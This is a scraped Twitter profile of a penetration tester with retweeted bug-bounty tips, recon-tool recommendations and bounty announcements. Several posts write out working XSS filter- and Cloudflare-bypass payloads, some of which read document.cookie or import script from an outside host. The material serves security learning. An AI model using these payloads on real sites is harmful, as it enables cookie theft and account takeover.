0xShohel (@shohel_96) 's Twitter Profile
0xShohel

@shohel_96

eCPPT, eWPTX, CEH | Penetration Tester | Vulnerability Assessment

ID: 1356503373751586816

calendar_today02-02-2021 07:24:11

2,2K Tweet

253 Followers

1,1K Following

Avanish Pathak (@avanish46) 's Twitter Profile Photo

After 2 days of struggling, Bypassed a strong XSS filter on one of the private program. [ No '>' was allowed , no Html tags, Character length 35 ] XSS Payload used :- <svg onload="alert(1)" <="" svg="" XSS Payloads #BugBountyTips #BugBounty

After 2 days of struggling, Bypassed a strong XSS filter on one of the private program.
[ No '&gt;' was allowed , no Html tags, Character length 35 ]
XSS Payload used :- 
&lt;svg onload="alert(1)" &lt;="" svg=""
<a href="/XssPayloads/">XSS Payloads</a> 
#BugBountyTips #BugBounty
N$ (@nav1n0x) 's Twitter Profile Photo

You guys always ask me how do I find SQL injections, its just simple. Avoid what everyone does and make your own methodology. Here is mine: 1. I don't normally go if the target is just target.com. I always prefer the target with wide scope. 1/n #BugBounty

Luke Stephens (hakluke) (@hakluke) 's Twitter Profile Photo

I use this tool regularly! It's very simple, it does reverse DNS lookups as fast as possible. It's a great way of discovering domains and subdomains owned by a company when you know their IP address range(s). github.com/hakluke/hakrevโ€ฆ

I use this tool regularly!

It's very simple, it does reverse DNS lookups as fast as possible. It's a great way of discovering domains and subdomains owned by a company when you know their IP address range(s).

github.com/hakluke/hakrevโ€ฆ
๐• Bug Bounty Writeups ๐• (@bountywriteups) 's Twitter Profile Photo

Donโ€™t know where to look for bugsย ?? In Depth Recon Bug Bountyโ€Šโ€”โ€ŠPart 02 omarora1603.medium.com/dont-know-wherโ€ฆ #bugbounty #bugbountytips #bugbountytip

./Mr-Dark (@mr_dark55) 's Twitter Profile Photo

All the power of PayloadsAllTheThings, without the overhead. This extension adds autocompletion support and useful payloads in Burp Suite to make your intrusion easier. github.com/synacktiv/HopLโ€ฆ

Gabriel (Umanhonlen | Sudo ๐Ÿฆœ) (@sudosu01) 's Twitter Profile Photo

MY LAB PAYLOADS ๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“ XSS PAYLOADS <base href="alert(1)" onfocus="a = /\/([^/]+)$/.exec(baseURI); eval(a[1]);" tabindex=1 style="display:block" autofocus></base> <img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>

MY LAB PAYLOADS 
๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“๐Ÿ“

XSS PAYLOADS
&lt;base href="alert(1)" onfocus="a = /\/([^/]+)$/.exec(baseURI); eval(a[1]);" tabindex=1 style="display:block" autofocus&gt;&lt;/base&gt;
&lt;img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`&gt;
Het Mehta (@hetmehtaa) 's Twitter Profile Photo

XSS on any website with missing charset information? ๐Ÿ”ฅ Attackers may use the ISO-2022-JP character encoding to inject arbitrary JavaScript code into a website. Read more in Sonar Research's recent blog post: sonarsource.com/blog/encoding-โ€ฆ #appsec #security #vulnerability #RedTeam

XSS on any website with missing charset information? ๐Ÿ”ฅ

Attackers may use the ISO-2022-JP character encoding to inject arbitrary JavaScript code into a website. 
Read more in <a href="/sonar_research/">Sonar Research</a>'s recent blog post:

sonarsource.com/blog/encoding-โ€ฆ

#appsec #security #vulnerability #RedTeam
bugcrowd (@bugcrowd) 's Twitter Profile Photo

unfurl is awesome ๐Ÿš€ Pull bits out of URLs including domains, TLDs, paths, apexes and so much more! Definitely worth checking out. Another great tool from @tomnomnom ๐Ÿ˜Ž

unfurl is awesome ๐Ÿš€

Pull bits out of URLs including domains, TLDs, paths, apexes and so much more! 

Definitely worth checking out. 

Another great tool from @tomnomnom ๐Ÿ˜Ž
Biscuit (@oreobiscui74046) 's Twitter Profile Photo

Here I document all the possible #bugbounty #Methodologies I found on internet Medium 15 YouTube 38 Github 4 oreobiscuit.gitbook.io/introduction/mโ€ฆ

XSS Payloads (@xsspayloads) 's Twitter Profile Photo

2 cloudflare bypass payloads by Shad0wH3x <img//////src=x oNlY=1 oNerror=alert(document.cookie)(import(/https:\\X55.is/?1=18369/.sourโ€ฆ> '/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=alert(1)/**/(import(/https:\\X55.is/?1=18369/.sourโ€ฆ>

Ali (@111xnagashy) 's Twitter Profile Photo

Tip:- Install extension (findsomething) on Chrome and Firefox sometimes it give you juicy endpointsโœ… Explanation in comments โ†“ #bugbountytips #bugbountytip #bugbounty #hackerone #bugcrowd #h1

Tip:-

Install extension (findsomething) on Chrome and Firefox sometimes it give you juicy endpointsโœ…

Explanation in comments โ†“

#bugbountytips  #bugbountytip  #bugbounty #hackerone  #bugcrowd  #h1
0xShohel (@shohel_96) 's Twitter Profile Photo

Alhamdulillah! I received a bounty on the ็ฌ‘ใ„็”ทใฎๅ‚พๅ€’่€… platform for identifying a Security Misconfiguration vulnerability! #bugbounty #penetrationtest #yogosha #cybersecurity

Alhamdulillah! I received a bounty on the <a href="/Yogosha/">็ฌ‘ใ„็”ทใฎๅ‚พๅ€’่€…</a> platform for identifying a Security Misconfiguration vulnerability!

#bugbounty #penetrationtest #yogosha #cybersecurity
Kรฉvin GERVOT (Mizu) (@kevin_mizu) 's Twitter Profile Photo

I'm happy to say that the DOMLogger++ workshop created for GreHack is now available ๐Ÿ˜ I've written it in a way that it can serve as documentation. I hope it helps you understand how to use it properly! Website: domloggerpp-workshop.mizu.re:5173 GitHub: github.com/kevin-mizu/domโ€ฆ

I'm happy to say that the DOMLogger++ workshop created for <a href="/GrehackConf/">GreHack</a> is now available ๐Ÿ˜

I've written it in a way that it can serve as documentation. I hope it helps you understand how to use it properly!

Website: domloggerpp-workshop.mizu.re:5173
GitHub: github.com/kevin-mizu/domโ€ฆ
Godfather Orwa ๐Ÿ‡ฏ๐Ÿ‡ด (@godfatherorwa) 's Twitter Profile Photo

Hello everyone โ™ฅ a little bit write-up of #bugbountytip #bugbountytips I am going to write here ..... Title: getting unauthorized access on 3rd party's/workspaces & and building your checklist for quickly locating bugs there via massive recon we know that its helpful to look

Hello everyone โ™ฅ
a little bit write-up of #bugbountytip #bugbountytips I am going to write here ..... 

Title:
getting unauthorized access on 3rd party's/workspaces &amp; and building your checklist for quickly locating bugs there via massive recon

we know that its helpful to look
0xShohel (@shohel_96) 's Twitter Profile Photo

ust responsibly hacked into GEA ๐ŸŽฏ Found a Stored XSS โ†’ Account Takeover vuln. They patched it, added me to the Hall of Fame ๐Ÿ†, and sent some awesome swag ๐Ÿ‘€๐Ÿ”ฅ #BugBounty #XSS #InfoSec #HackerLife #ResponsibleDisclosure

ust responsibly hacked into GEA ๐ŸŽฏ
Found a Stored XSS โ†’ Account Takeover vuln.
They patched it, added me to the Hall of Fame ๐Ÿ†, and sent some awesome swag ๐Ÿ‘€๐Ÿ”ฅ
#BugBounty #XSS #InfoSec #HackerLife #ResponsibleDisclosure
Olexander (@_aircorridor) 's Twitter Profile Photo

Cloudflare hides 19.3% of all websitesโ€”but not perfectly. CloudRip scans subdomains to find IPs not behind Cloudflare protection, exposing the real origin server: hackers-arise.com/web-app-hackinโ€ฆ OccupytheWeb

Cloudflare hides 19.3% of all websitesโ€”but not perfectly.

CloudRip scans subdomains to find IPs not behind Cloudflare protection, exposing the real origin server:
hackers-arise.com/web-app-hackinโ€ฆ
<a href="/three_cube/">OccupytheWeb</a>